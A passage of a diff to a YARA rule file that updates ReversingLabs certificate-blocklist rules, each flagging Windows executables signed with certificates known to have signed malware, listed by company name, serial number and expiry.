+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and ( pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" or pe.signatures [ i ] . serial == "9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" ) and 1592363914 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C04F5D17Af872Cb2C37E3367Fe761D0D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "938cdd31-433d-5df7-b00e-54a7e440810b"
+		id = "d7ef2bdf-afba-5254-bef2-78f4b6d5ecea"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10390-L10406"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4364-L4382"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "72ca07b7722f9506c5c42b5e58c5ce9b3a7d607164a5f265015769f2831cd588"
+		logic_hash = "4a4d60aa3722a710fe23d5e11c55a28bfe721bb4e797b041d58f62a994487799"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21053,21 +43447,21 @@ rule REVERSINGLABS_Cert_Blocklist_69A72F5591Ad78A0825Fbb9402Ab9543 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" and 1581811200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DES SP Z O O" and ( pe.signatures [ i ] . serial == "00:c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" or pe.signatures [ i ] . serial == "c0:4f:5d:17:af:87:2c:b2:c3:7e:33:67:fe:76:1d:0d" ) and 1594590024 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_02C5351936Abe405Ac760228A40387E8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "792111be-7c8a-53f5-9ec3-e1f25f083666"
+		id = "6a1e5115-ac72-57a3-8418-7c81f38f76af"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10408-L10424"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4384-L4400"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5e3c8654169830790665992f5d7669d0ca6c1c8048580b3ae70331ad2a763a6c"
+		logic_hash = "5a990f8d1a3f467cdafa0f625bc162745d9201e15ce43fdc93cd6b1730572e89"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21077,21 +43471,21 @@ rule REVERSINGLABS_Cert_Blocklist_0883Db137021B51F3A2A08A76A4Bc066 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Divertida Creative Limited" and pe.signatures [ i ] . serial == "08:83:db:13:70:21:b5:1f:3a:2a:08:a7:6a:4b:c0:66" and 1627430400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0cb5be9e-a0b7-5785-87f3-ad097d4ab479"
+		id = "db9f022b-f650-5d40-ae84-4df92b0f3a96"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10426-L10442"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4402-L4420"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a00eb9837f7700d83862dff2077d85c68c24621d7aacf857b42587dc37976465"
+		logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21101,21 +43495,21 @@ rule REVERSINGLABS_Cert_Blocklist_2B921Aaaba777B5A99507196C6F1C46C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Python Software Foundation" and pe.signatures [ i ] . serial == "2b:92:1a:aa:ba:77:7b:5a:99:50:71:96:c6:f1:c4:6c" and 1648425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Komp.IT" and ( pe.signatures [ i ] . serial == "00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures [ i ] . serial == "1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" ) and 1588723200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b1c650bb-b53f-5cca-8cc2-4d3498285d31"
+		id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10444-L10460"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4422-L4440"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "726ac44dd8109fcd0a9120f6c0673b8ecf7d5b3a4bb81976f48402e21502201a"
+		logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21125,21 +43519,21 @@ rule REVERSINGLABS_Cert_Blocklist_0332D5C942869Bdcabf5A8266197Cd14 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAWRO SP Z O O" and pe.signatures [ i ] . serial == "03:32:d5:c9:42:86:9b:dc:ab:f5:a8:26:61:97:cd:14" and 1622160000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Euro May SP Z O O" and ( pe.signatures [ i ] . serial == "00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures [ i ] . serial == "b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" ) and 1585267200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8d1810e7-9b64-52b3-91c6-f03832d61d3a"
+		id = "c0015521-b163-51ab-8c27-da3b1a8df084"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10462-L10478"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4442-L4458"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bdb68be92b3ba6b5eaa6e8e963529c0b9213942ba2552c687496ad5d12d5b472"
+		logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21149,21 +43543,21 @@ rule REVERSINGLABS_Cert_Blocklist_4679C5398A279318365Fd77A84445699 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" and 1643846400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infoware Cloud Limited" and pe.signatures [ i ] . serial == "11:26:13:b7:b5:f6:96:cf:37:76:80:f6:46:3f:cc:8c" and 1566518400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B3F906E5E6B2Cf61C5E51Be79B4E8777 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "918fa696-5c92-551b-a87b-6410a6dc718a"
+		id = "dc826355-bd15-58b3-adcb-55b704f03c0d"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10480-L10496"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4460-L4478"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bce92750f71477ecfa7b8213724344708066c0e6133a47cd6758bbd9f8f9da5f"
+		logic_hash = "037e154854c1128fb73d2221c2b7d7211d977492378614fcf4fde959207e34b3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21173,21 +43567,21 @@ rule REVERSINGLABS_Cert_Blocklist_101D6A5A29D9A77807553Ceac669D853 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" and 1646352000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Accelerate Technologies Ltd" and ( pe.signatures [ i ] . serial == "00:b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" or pe.signatures [ i ] . serial == "b3:f9:06:e5:e6:b2:cf:61:c5:e5:1b:e7:9b:4e:87:77" ) and 1594900020 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_566Ac16A57B132D3F64Dced14De790Ee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b025fe73-89fa-55f2-8b3a-cb46251669e6"
+		id = "cb2ebbd5-5036-52f6-a064-11609f02309f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10498-L10514"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4480-L4496"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "00ceb241555154cab97ef616042dbd966f3a8fae257e142dfe6bad9559bd1724"
+		logic_hash = "48f4d334614f6c413907d51f4d6312554b13c4f5a3c03070ceba48baa13a8247"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21197,21 +43591,21 @@ rule REVERSINGLABS_Cert_Blocklist_6000F8C02B0A15B1E53B8399845Faddf : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" and 1644278400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Unirad LLC" and pe.signatures [ i ] . serial == "56:6a:c1:6a:57:b1:32:d3:f6:4d:ce:d1:4d:e7:90:ee" and 1562889600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D2Caf7908Aaebfa1A8F3E2136Fece024 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f5eee11-4106-5923-9563-84f81199bea0"
+		id = "6c2c4fc6-5359-55fa-bf79-9202caa5f326"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10516-L10532"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4498-L4516"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a5d603cf64c8a16fa12daf9c6b5d0850e6145fb39b38442ed724ec0f849b8be9"
+		logic_hash = "cf4d17274ef36d61e78578d34634bf6e5fb0fb857a9a92184916b0f3b8484568"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21221,21 +43615,21 @@ rule REVERSINGLABS_Cert_Blocklist_121070Be1E782F206985543Bc7Bc58B6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Prod Can Holdings Inc." and pe.signatures [ i ] . serial == "12:10:70:be:1e:78:2f:20:69:85:54:3b:c7:bc:58:b6" and 1647820800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FANATOR, OOO" and ( pe.signatures [ i ] . serial == "00:d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" or pe.signatures [ i ] . serial == "d2:ca:f7:90:8a:ae:bf:a1:a8:f3:e2:13:6f:ec:e0:24" ) and 1599041760 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E04A344B397F752A45B128A594A3D6B5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5a4abffb-ac0d-5e70-8193-0cd1a83377ac"
+		id = "b396e08c-b7dc-5498-9c68-2d8cdc5dd3d3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10534-L10550"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4518-L4536"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ba1155b30761f48674aaa82a70a06fea30cced6518f089f3f9f173a4eb06a09"
+		logic_hash = "0489577c6050f0c5d1dad5bda8c4f3c895902b932cd0324087712ccb83f14680"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21245,21 +43639,21 @@ rule REVERSINGLABS_Cert_Blocklist_5226A724Cfa0B4Bc0164Ecda3F02A3Dc : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALENTE SP Z O O" and pe.signatures [ i ] . serial == "52:26:a7:24:cf:a0:b4:bc:01:64:ec:da:3f:02:a3:dc" and 1647302400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and ( pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" or pe.signatures [ i ] . serial == "e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" ) and 1597708800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3Bcaed3Ef678F2F9Bf38D09E149B8D70 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2b177573-8b9f-538f-8d07-b7baede1148d"
+		id = "0aea5110-569b-5d9c-a2ce-a6a9fe75b58e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10552-L10568"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4538-L4554"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c4aa22241ef72d454db4ec0fb0933abfa7b1d8d1029b45410475832cda4a2af4"
+		logic_hash = "dbf85cbd1d92823287749dac312f95576900753f60a694347b31b1e3aaa288a8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21269,21 +43663,21 @@ rule REVERSINGLABS_Cert_Blocklist_0A7Be7722B65A866Ebcd3Bd7F8F10825 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rebound Infotech Limited" and pe.signatures [ i ] . serial == "0a:7b:e7:72:2b:65:a8:66:eb:cd:3b:d7:f8:f1:08:25" and 1637971200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "StarY Media Inc." and pe.signatures [ i ] . serial == "3b:ca:ed:3e:f6:78:f2:f9:bf:38:d0:9e:14:9b:8d:70" and 1599091200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56D576A062491Ea0A5877Ced418203A1 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c9a05c35-2aed-5944-aad7-65ae2c290c6c"
+		id = "3db67353-6310-54ad-b46a-97daf63fee42"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10570-L10586"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4556-L4572"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f5941c74821c0cd76633393d0346a9de2c7bccc666dc20b34c5b4d733faefc8f"
+		logic_hash = "19bd6834b432f3dc8786b449241082b359275559a112a8ef4a51efe185b256dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21293,21 +43687,21 @@ rule REVERSINGLABS_Cert_Blocklist_05634456Dbedb3556Ca8415E64815C5D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Walden Intertech Inc." and pe.signatures [ i ] . serial == "05:63:44:56:db:ed:b3:55:6c:a8:41:5e:64:81:5c:5d" and 1648425600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" and 1596249885 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Fcba260Df7Da602Ecf4D4D6Fc89D5Dd : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "39d23cbf-862f-5a3d-9e30-b3f0929963d5"
+		id = "ce248602-1f28-5707-b921-640271176e7f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10588-L10604"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4574-L4590"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bad2144c9cde02a75fa968e3c24178f3ba73b0addb2b4967f24733b933e0eeb6"
+		logic_hash = "4e9a3e516342820248ebf9b3605b8ce2dbf1d9b4255a5b74f7369dd2f1cdd9d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21317,21 +43711,21 @@ rule REVERSINGLABS_Cert_Blocklist_2E07A8D6E3B25Ae010C8Ed2C4Ab0Fb37 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Emurasoft, Inc." and pe.signatures [ i ] . serial == "2e:07:a8:d6:e3:b2:5a:e0:10:c8:ed:2c:4a:b0:fb:37" and 1650499200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gold Stroy SP Z O O" and pe.signatures [ i ] . serial == "0f:cb:a2:60:df:7d:a6:02:ec:f4:d4:d6:fc:89:d5:dd" and 1593388801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4152169F22454Ed604D03555B7Afb175 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "27c60ade-41e1-5ba4-be8d-275edc01b5ba"
+		id = "e8975a1a-ac7c-5016-a206-de9ca7eea37f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10606-L10622"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4592-L4608"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "673ec5a1cacb9a7be101a4a533baf5a1eab4e6dd8721c69e56636701c5303c72"
+		logic_hash = "fbb2124b934c270739f564317526d5b23b996364372426485d7c994a83293866"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -21341,21 +43735,21 @@ rule REVERSINGLABS_Cert_Blocklist_30B4Eeebd88Fd205Acc8577Bbaed8655 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enforcer Srl" and pe.signatures [ i ] . serial == "30:b4:ee:eb:d8:8f:d2:05:ac:c8:57:7b:ba:ed:86:55" and 1646179200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" and 1595808000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B3391A6C1B3C6836533959E2384Ab4Ca : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_01C88Ccbd219500139D1Af138A9E898E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ab274ae3-0884-517a-a221-2c952fc9d74c"
+		id = "e3bd6be6-461c-56fd-8dfd-8205845f731e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10624-L10642"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L4610-L4626"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "38e38acfbfbf63b7179d2f8656f70224afa9269a7bdecd10ccbbbd92a6a216d3"
